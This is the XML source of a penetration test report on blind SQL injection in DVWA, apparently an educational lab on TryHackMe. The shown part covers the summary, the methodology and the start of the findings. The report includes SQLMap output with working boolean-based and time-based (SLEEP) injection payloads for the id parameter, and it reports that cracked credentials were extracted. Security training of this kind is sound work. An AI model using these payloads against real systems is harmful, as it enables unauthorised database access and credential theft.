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pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injection Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E4057" w:sz="8"/>
        </w:pBd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0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="E0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DVWA (Damn Vulnerable Web Application)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0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Target IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="E0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10.114.186.145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0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Assessment Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="E0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">June 24 – 25, 2026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0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Assessed By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="E0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Abdalrhman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0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="E0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SQLMap v1.9.8, Burp Suite Community v2025.7.4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0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="E0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Confidential — Educational Lab Report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E0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="E0E0E0" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A blind SQL injection assessment was conducted against the DVWA (Damn Vulnerable Web Application) target hosted on TryHackMe at 10.114.186.145. The assessment covered all three security levels (Low, Medium, and High) of the SQL Injection (Blind) module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL injection vulnerabilities were successfully identified and exploited across all three security levels. Complete database compromise was achieved, including full extraction of the users table containing five credential pairs. All MD5 password hashes were successfully cracked, yielding plaintext credentials for every account.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Target</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10.114.186.145 — DVWA on TryHackMe</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Module</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SQL Injection (Blind)</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Vulnerability</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Blind SQL Injection in id parameter</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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:left w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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Security Levels Broken</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:left w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF8F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Low, Medium, High (all levels)</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Impact</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Full database compromise — 5 accounts extracted and cracked</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Assessment Period</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June 24–25, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w: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Application</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DVWA v1.10 *Development*</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Platform</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TryHackMe (isolated lab environment)</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Target URL</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http://10.114.186.145/vulnerabilities/sqli_blind/</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Server OS</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Linux Ubuntu</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Web Server</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Apache 2.4.7</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PHP Version</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5.5.9-1ubuntu4.26</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Database</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MySQL ≥ 5.0.12</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Levels Tested</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Low, Medium, High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment followed a structured exploitation methodology:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection Point Confirmation — verify the parameter is injectable using SQLMap database enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean-based Extraction — enumerate databases, tables, columns, and dump all data using boolean-based blind injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Time-based Blind Injection — confirm SLEEP()-based injection as an alternative technique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium Level Bypass — intercept and modify POST parameters using Burp Suite Repeater to bypass the dropdown control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">High Level Bypass — inject via the cookie parameter using Burp Suite Repeater to bypass the popup-based input control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Confirming the Injection Point (Low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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:left w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</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Parameter</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id (GET parameter)</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Endpoint</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/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit</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Techniques</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Boolean-based blind, Time-based blind</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DBMS</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MySQL ≥ 5.0.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The id parameter on the Blind SQL Injection page is inserted directly into a MySQL SELECT query without sanitization or parameterization at the Low security level. Because the application does not display database errors or query results, the vulnerability is classified as Blind SQL Injection. The page's only visible response difference is "User ID exists in the database." for valid conditions versus a blank response for false conditions — this difference is the "oracle" that enables data extraction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQLMap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--dbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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available databases [4]:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] dvwa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] information_schema</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] mysql</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] performance_schema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Injection Techniques Detected by SQLMap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Type: boolean-based blind</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Title: AND boolean-based blind - WHERE or HAVING clause</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload: id=1' AND 3637=3637 AND 'bxpj'='bxpj&amp;Submit=Submit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Type: time-based blind</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload: id=1' AND (SELECT 4792 FROM (SELECT(SLEEP(5)))pPHJ) AND 'tRBy'='tRBy&amp;Submit=Submit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E0E0E0" w:sz="4"/>
